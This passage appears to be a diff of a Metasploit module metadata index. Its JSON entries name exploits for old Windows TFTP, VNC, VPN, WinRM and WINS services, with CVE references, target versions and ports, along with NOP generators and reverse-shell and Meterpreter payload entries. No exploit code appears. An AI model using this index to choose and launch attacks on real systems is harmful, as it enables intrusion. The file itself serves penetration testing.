format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). 
By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.", + "references": [ + "CVE-2008-2161", + "OSVDB-44904", + "BID-29111", + "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "OpenTFTP 1.4 Service", + "OpenTFTP 1.4 Stand Alone" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/opentftp_error_code.rb", + "is_install_path": true, + "ref_name": "windows/tftp/opentftp_error_code", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/quick_tftp_pro_mode": { + "name": "Quick FTP Pro 2.1 Transfer-Mode Overflow", + "fullname": "exploit/windows/tftp/quick_tftp_pro_mode", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-03-27", + "type": "exploit", + "author": [ + "Saint Patrick" + ], + "description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. 
This is a port of a sploit by Mati \"muts\" Aharoni.", + "references": [ + "CVE-2008-1610", + "OSVDB-43784", + "BID-28459", + "URL-http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2000", + "Windows XP SP2" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/quick_tftp_pro_mode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpd32_long_filename": { + "name": "TFTPD32 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpd32_long_filename", + "aliases": [], + "rank": 200, + "disclosure_date": "2002-11-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. 
By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.", + "references": [ + "CVE-2002-2226", + "OSVDB-45903", + "BID-6199" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows NT 4.0 SP6a English", + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpd32_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpdwin_long_filename": { + "name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpdwin_long_filename", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-09-21", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. 
By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.", + "references": [ + "CVE-2006-4948", + "OSVDB-29032", + "BID-20131", + "EDB-3132" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal - tftpd.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpdwin_long_filename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/tftpserver_wrq_bof": { + "name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", + "fullname": "exploit/windows/tftp/tftpserver_wrq_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-03-26", + "type": "exploit", + "author": [ + "Mati Aharoni", + "Datacut" + ], + "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. 
A failed attempt will result a denial-of-service.", + "references": [ + "CVE-2008-1611", + "OSVDB-43785", + "BID-18345", + "EDB-5314" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 EN Service Mode", + "Windows XP SP2/SP3 EN Standalone Mode", + "Windows 7 SP0/SP1 EN x64 Service Mode", + "Windows 7 SP0/SP1 EN x64 Standalone Mode", + "Windows 7 SP0/SP1 EN x86 Service Mode", + "Windows 7 SP0/SP1 EN x86 Standalone Mode" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb", + "is_install_path": true, + "ref_name": "windows/tftp/tftpserver_wrq_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/tftp/threectftpsvc_long_mode": { + "name": "3CTftpSvc TFTP Long Mode Buffer Overflow", + "fullname": "exploit/windows/tftp/threectftpsvc_long_mode", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-11-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. 
By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.", + "references": [ + "CVE-2006-6183", + "OSVDB-30758", + "BID-21301", + "URL-http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113" + ], + "platform": "Windows", + "arch": "", + "rport": 69, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "3CTftpSvc 2.0.1" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb", + "is_install_path": true, + "ref_name": "windows/tftp/threectftpsvc_long_mode", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/unicenter/cam_log_security": { + "name": "CA CAM log_security() Stack Buffer Overflow (Win32)", + "fullname": "exploit/windows/unicenter/cam_log_security", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-08-22", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. 
This module has\n been tested on Unicenter v3.1.", + "references": [ + "CVE-2005-2668", + "OSVDB-18916", + "BID-14622" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "W2API.DLL TNG 2.3", + "Windows 2000 SP0-SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/unicenter/cam_log_security.rb", + "is_install_path": true, + "ref_name": "windows/unicenter/cam_log_security", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/realvnc_client": { + "name": "RealVNC 3.3.7 Client Buffer Overflow", + "fullname": "exploit/windows/vnc/realvnc_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2001-01-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).", + "references": [ + "CVE-2001-0167", + "OSVDB-6281", + "BID-2305" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/realvnc_client.rb", + "is_install_path": true, + "ref_name": "windows/vnc/realvnc_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/ultravnc_client": { + "name": "UltraVNC 1.0.1 Client Buffer Overflow", + "fullname": "exploit/windows/vnc/ultravnc_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-04-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer 
overflow in UltraVNC Win32\n Viewer 1.0.1 Release.", + "references": [ + "CVE-2006-1652", + "OSVDB-24456", + "BID-17378" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 SP4 English", + "Windows XP SP2 English", + "Windows 2003 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/ultravnc_client.rb", + "is_install_path": true, + "ref_name": "windows/vnc/ultravnc_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/ultravnc_viewer_bof": { + "name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow", + "fullname": "exploit/windows/vnc/ultravnc_viewer_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-02-06", + "type": "exploit", + "author": [ + "noperand" + ], + "description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.", + "references": [ + "CVE-2008-0610", + "OSVDB-42840", + "BID-27561" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb", + "is_install_path": true, + "ref_name": "windows/vnc/ultravnc_viewer_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vnc/winvnc_http_get": { + "name": "WinVNC Web Server GET Overflow", + 
"fullname": "exploit/windows/vnc/winvnc_http_get", + "aliases": [], + "rank": 200, + "disclosure_date": "2001-01-29", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!", + "references": [ + "BID-2306", + "OSVDB-6280", + "CVE-2001-0168" + ], + "platform": "Windows", + "arch": "", + "rport": 5800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows NT4 SP3-6", + "Windows 2000 SP1-4", + "Windows XP SP0-1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vnc/winvnc_http_get.rb", + "is_install_path": true, + "ref_name": "windows/vnc/winvnc_http_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/vpn/safenet_ike_11": { + "name": "SafeNet SoftRemote IKE Service Buffer Overflow", + "fullname": "exploit/windows/vpn/safenet_ike_11", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-06-01", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. 
This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.", + "references": [ + "CVE-2009-1943", + "OSVDB-54831", + "BID-35154", + "URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": 62514, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SafeNet Irelke 10.8.0.20", + "SafeNet Irelke 10.8.0.10", + "SafeNet Irelke 10.8.3.6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/vpn/safenet_ike_11.rb", + "is_install_path": true, + "ref_name": "windows/vpn/safenet_ike_11", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/winrm/winrm_script_exec": { + "name": "WinRM Script Exec Remote Code Execution", + "fullname": "exploit/windows/winrm/winrm_script_exec", + "aliases": [], + "rank": 0, + "disclosure_date": "2012-11-01", + "type": "exploit", + "author": [ + "thelightcosine" + ], + "description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. 
Otherwise it falls back to the VBS CmdStager which is\n less stealthy.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], + "targets": [ + "Windows" + ], + "mod_time": "2023-01-03 11:26:07 +0000", + "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb", + "is_install_path": true, + "ref_name": "windows/winrm/winrm_script_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/wins/ms04_045_wins": { + "name": "MS04-045 Microsoft WINS Service Memory Overwrite", + "fullname": "exploit/windows/wins/ms04_045_wins", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-12-14", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits an arbitrary memory write flaw in the\n WINS service. 
This exploit has been tested against Windows\n 2000 only.", + "references": [ + "CVE-2004-1080", + "OSVDB-12378", + "BID-11763", + "MSB-MS04-045" + ], + "platform": "Windows", + "arch": "", + "rport": 42, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/wins/ms04_045_wins.rb", + "is_install_path": true, + "ref_name": "windows/wins/ms04_045_wins", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "nop_aarch64/simple": { + "name": "Simple", + "fullname": "nop/aarch64/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "timwr" + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/aarch64/simple.rb", + "is_install_path": true, + "ref_name": "aarch64/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_armle/simple": { + "name": "Simple", + "fullname": "nop/armle/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "armle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/armle/simple.rb", + "is_install_path": true, + "ref_name": "armle/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_cmd/generic": { + "name": "Generic 
Command Nop Generator", + "fullname": "nop/cmd/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm ", + "bcoles " + ], + "description": "Generates harmless padding for command payloads.", + "references": [], + "platform": "All", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-28 15:29:56 +0000", + "path": "/modules/nops/cmd/generic.rb", + "is_install_path": true, + "ref_name": "cmd/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_mipsbe/better": { + "name": "Better", + "fullname": "nop/mipsbe/better", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "jm" + ], + "description": "Better NOP generator", + "references": [], + "platform": "All", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/mipsbe/better.rb", + "is_install_path": true, + "ref_name": "mipsbe/better", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_php/generic": { + "name": "PHP Nop Generator", + "fullname": "nop/php/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Generates harmless padding for PHP scripts", + "references": [], + "platform": "All", + "arch": "php", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/php/generic.rb", + "is_install_path": true, + "ref_name": "php/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false + }, + "nop_ppc/simple": { + "name": "Simple", + "fullname": "nop/ppc/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/ppc/simple.rb", + "is_install_path": true, + "ref_name": "ppc/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_riscv32le/simple": { + "name": "Simple", + "fullname": "nop/riscv32le/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "bcoles " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-01 02:46:28 +0000", + "path": "/modules/nops/riscv32le/simple.rb", + "is_install_path": true, + "ref_name": "riscv32le/simple", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_riscv64le/simple": { + "name": "Simple", + "fullname": "nop/riscv64le/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "bcoles " + ], + "description": "Simple NOP generator", + "references": [], + "platform": "All", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-10-01 02:46:28 +0000", + "path": "/modules/nops/riscv64le/simple.rb", + "is_install_path": true, + "ref_name": "riscv64le/simple", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_sparc/random": { + "name": "SPARC NOP Generator", + "fullname": "nop/sparc/random", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "vlad902 " + ], + "description": "SPARC NOP generator", + "references": [], + "platform": "All", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/sparc/random.rb", + "is_install_path": true, + "ref_name": "sparc/random", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_tty/generic": { + "name": "TTY Nop Generator", + "fullname": "nop/tty/generic", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "hdm " + ], + "description": "Generates harmless padding for TTY input", + "references": [], + "platform": "All", + "arch": "tty", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/tty/generic.rb", + "is_install_path": true, + "ref_name": "tty/generic", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x64/simple": { + "name": "Simple", + "fullname": "nop/x64/simple", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "sf " + ], + "description": "An x64 single/multi byte NOP instruction generator.", + "references": [], + "platform": "All", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x64/simple.rb", + "is_install_path": true, + "ref_name": "x64/simple", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x86/opty2": { + "name": "Opty2", + "fullname": "nop/x86/opty2", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "spoonm ", + "optyx " + ], + "description": "Opty2 multi-byte NOP generator", + "references": [], + "platform": "All", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x86/opty2.rb", + "is_install_path": true, + "ref_name": "x86/opty2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "nop_x86/single_byte": { + "name": "Single Byte", + "fullname": "nop/x86/single_byte", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "nop", + "author": [ + "spoonm " + ], + "description": "Single-byte NOP generator", + "references": [], + "platform": "All", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-13 11:27:49 +0000", + "path": "/modules/nops/x86/single_byte.rb", + "is_install_path": true, + "ref_name": "x86/single_byte", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false + }, + "payload_aix/ppc/shell_bind_tcp": { + "name": "AIX Command Shell, Bind TCP Inline", + "fullname": "payload/aix/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 
+0000", + "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_aix/ppc/shell_find_port": { + "name": "AIX Command Shell, Find Port Inline", + "fullname": "payload/aix/ppc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_aix/ppc/shell_interact": { + "name": "AIX execve Shell for inetd", + "fullname": "payload/aix/ppc/shell_interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "jduck " + ], + "description": "Simply execve /bin/sh (for inetd programs)", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + 
"payload_aix/ppc/shell_reverse_tcp": { + "name": "AIX Command Shell, Reverse TCP Inline", + "fullname": "payload/aix/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "AIX", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "aix/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_android/meterpreter/reverse_http": { + "name": "Android Meterpreter, Android Reverse HTTP Stager", + "fullname": "payload/android/meterpreter/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "anwarelmakrahy" + ], + "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_http.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_http" + }, + "payload_android/meterpreter/reverse_https": { + "name": "Android Meterpreter, Android Reverse HTTPS Stager", + "fullname": 
"payload/android/meterpreter/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves", + "anwarelmakrahy" + ], + "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_https.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_https" + }, + "payload_android/meterpreter/reverse_tcp": { + "name": "Android Meterpreter, Android Reverse TCP Stager", + "fullname": "payload/android/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "mihi", + "egypt ", + "OJ Reeves" + ], + "description": "Run a meterpreter server in Android.\n\nConnect back stager", + "references": [], + "platform": "Android", + "arch": "dalvik", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/android/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "android/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "android/meterpreter", + "stager_refname": "android/reverse_tcp" + }, + "payload_android/meterpreter_reverse_http": { + "name": "Android Meterpreter Shell, Reverse HTTP Inline", 
